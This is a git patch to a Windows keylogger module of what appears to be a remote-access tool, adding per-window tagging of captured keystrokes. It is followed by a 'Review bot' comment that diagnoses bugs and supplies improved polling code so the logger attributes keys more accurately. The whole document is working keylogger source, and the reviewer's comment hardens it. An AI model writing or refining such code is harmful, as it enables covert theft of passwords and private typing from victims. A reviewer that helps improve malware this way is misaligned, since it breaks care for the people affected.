From 0edf4db9dc06588e6b6e44f3559677af571e3c08 Mon Sep 17 00:00:00 2001
From: golind
Date: Fri, 23 Oct 2015 18:19:43 +0000
Subject: [PATCH] keylogger by active window

For the most part this works as intended, it is a little strange when it comes to certain windows (right clickmenu for example, because there isnt a pid for it), clean up would be apreciated basically what this does logs keys based on active window and spits out the keys when the window is switched. i wasnt sure how attached you were to sleep() so I chose this method that tries not to spam too much.
---
 .../windows/all/pupwinutils/keylogger.py | 35 ++++++++++++++++---
 1 file changed, 31 insertions(+), 4 deletions(-)

diff --git a/pupy/packages/windows/all/pupwinutils/keylogger.py b/pupy/packages/windows/all/pupwinutils/keylogger.py
index 0db396f7..2c37fc70 100644
--- a/pupy/packages/windows/all/pupwinutils/keylogger.py
+++ b/pupy/packages/windows/all/pupwinutils/keylogger.py
@@ -24,6 +24,9 @@
 kernel32 = windll.kernel32
 WH_KEYBOARD_LL=13
 WM_KEYDOWN=0x0100
+psapi = windll.psapi
+current_window = None
+
 keyCodes={
 0x08 : "[BKSP]",
 0x09 : "[TAB]",
@@ -112,11 +115,35 @@ class KeyLogger(threading.Thread):
 self.keys_buffer+=hooked_key
 return user32.CallNextHookEx(self.hooked, nCode, wParam, lParam)

+#credit: Black Hat Python - https://www.nostarch.com/blackhatpython
+def get_current_process():
+ hwnd = user32.GetForegroundWindow()
+
+ pid = c_ulong(0)
+ user32.GetWindowThreadProcessId(hwnd, byref(pid))
+
+ process_id = "%d" % pid.value
+
+ executable = create_string_buffer("\x00" * 512)
+ h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
+ psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)
+
+ window_title = create_string_buffer("\x00" * 512)
+ length = user32.GetWindowTextA(hwnd, byref(window_title),512)
+
+ kernel32.CloseHandle(hwnd)
+ kernel32.CloseHandle(h_process)
+ return "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)
+
 if __name__=="__main__":
 keyLogger = KeyLogger()
 keyLogger.start()
 while True:
- time.sleep(5)
- print keyLogger.dump()
-
-
+ if keyLogger.keys_buffer == "":
+ continue
+ else:
+ curr_proc = get_current_process()
+ if current_window != curr_proc:
+ print keyLogger.dump()
+ current_window = curr_proc
+ print current_window
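Review bot: The polling loop in the `__main__` block attributes keystrokes to the wrong window: it only flushes once a key has already arrived in the *new* foreground window, so the dump printed just before `print current_window` mixes keys from the previous window with the first ones typed into the new one, and while the buffer is empty the loop spins at 100% CPU on `continue`. Because every key already arrives through the hook callback (the `self.keys_buffer+=hooked_key` line, whose method starts above this hunk), the sound fix is to call `get_current_process()` there and flush when the label changes, tagging keys at the moment they are captured; short of that, the loop below flushes under the label of the window the keys were typed into and sleeps between polls, which bounds misattribution to the poll interval. Separately, `kernel32.CloseHandle(hwnd)` in `get_current_process` is wrong — an HWND is not a kernel object handle, so the call fails with ERROR_INVALID_HANDLE (and breaks into the debugger if one is attached); drop it, and check that `OpenProcess` returned a non-zero handle, since it fails for elevated or protected targets and `GetModuleBaseNameA` then silently leaves `executable` empty. `length` is assigned but never used.
```python
if __name__=="__main__":
    keyLogger = KeyLogger()
    keyLogger.start()
    while True:
        time.sleep(0.5)  # poll; spinning on `continue` pegs a core
        curr_proc = get_current_process()
        if curr_proc != current_window:
            # whatever is buffered was typed into the previous window
            if keyLogger.keys_buffer != "":
                print current_window
                print keyLogger.dump()
            current_window = curr_proc
```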